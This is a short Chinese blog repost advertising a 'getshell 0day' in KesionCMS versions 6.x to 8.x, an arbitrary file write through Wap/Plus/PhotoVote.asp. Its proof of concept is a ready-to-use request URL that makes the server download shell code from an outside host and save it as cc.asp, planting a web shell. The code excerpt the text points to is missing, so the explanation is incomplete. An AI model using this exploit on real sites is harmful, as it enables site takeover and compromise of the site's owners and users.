科讯 6.x~8.x getshell 0day

  • 内容
  • 相关

详细说明:

个人感觉,类似phpcms的任意文件上传

Wap/Plus/PhotoVote.asp 14 – 23

上面的代码中这几句:

漏洞证明:

登陆后访问:
http://127.0.0.1/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.xssrc.cn/xssrc.txt
成功会在Wap/Plus下写入cc.asp,并返回文件名,其中的xssec.txt为shell代码。。



本文由 搬运工 科讯 6.x~8.x getshell 0day 摘抄,如有侵权请邮件告知。

本文标签:

版权声明:若无特殊注明,本文皆为《鬼少》原创,转载请保留文章出处。

本文链接:科讯 6.x~8.x getshell 0day - http://tv1314.com/post-506.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放